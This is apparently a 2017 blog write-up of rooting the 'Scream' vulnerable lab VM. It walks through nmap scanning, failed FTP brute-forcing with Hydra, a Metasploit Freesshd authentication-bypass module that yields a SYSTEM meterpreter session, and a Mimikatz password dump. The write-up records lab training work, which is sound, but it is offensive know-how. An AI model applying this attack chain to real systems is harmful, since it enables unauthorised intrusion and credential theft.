Scream: Write-up

This post contains the steps to get a root shell with Scream VM

This VM can he found here. Have a look to find even more VMs. But before starting the report, I’d like to congratulate g0tmi1k for his awesome tool : VulnInjector.

Ok, let’s do this write-up !

Host discovery

As always, we need to discover where the machine is on our network. To do so, let’s use Nmap:

1
nmap -sP 192.168.1.1/24 

Fingerprinting

After getting the IP address (192.168.1.2), we need to do some fingerprinting.

1
nmap -sV 192.168.1.2

Fig. Nmap scan result

As I saw it in the scan report, I decided to scan the port 80 with Nikto.

Fig. Nikto report on ports 80 (HTTP)

There was no interesting file or any ‘obvious’ vulnerability.

Then, I started to check the FTP server because the Banner was “War-ftpd”. I logged in with the anonymous user but after a while, I got blacklisted..

I guess the FTP server didn’t appreciate my attempts to exploit War-ftpd flaws, while trying to crack the ftp account with Hydra.

And, I got banned.

Fig. Time out of the FTP connection after getting blacklisted

Then, the lat attempt was with the SSH Server with the curious Banner “WeOnlyDo sshd 2.1.3”.. Mh.. This custom banner was interesting.

I decided to go further with the SSH service.

Exploitation

I started browsing on the internet to find some sshd vulnerabilities on Windows platform. Then, I found : Freesshd Authentication Bypass Metasploit module.

Fig. Looking for a Freesshd exploit

I decided to check it out. I knew there was an account called ftp but this didn’t work.

Fig. Setting the payload for the Freesshd exploit

So, I decided to bruteforce the logins using the file provided by Metasploit.

And.. It worked !

Fig. Successful exploitation with Freesshd exploit

Thanks to this vulnerability, I got a meterpreter session with SYSTEM privileges. Awesome !

Access Maintenance

We had a SYSTEM session but I was curious and I wanted to practice with Mimikatz. A (security) tool developed by a french guy who did some awesome work. In few words, it allows you to dump passwords with are stored in the memory.

Combined with our meterpreter, we’ve been able to load mimikatz and get the password: thisisaverylongpassword. And yes, it is.

Fig. Dumping passwords using Mimikatz

First Windows VM I’ve tried here and it was a great surprise. I learnt few tricks and that was nice.
Hope you liked it and good evening !

Copyright © 2017 - Paul A. (PaulSec). Powered by Octopress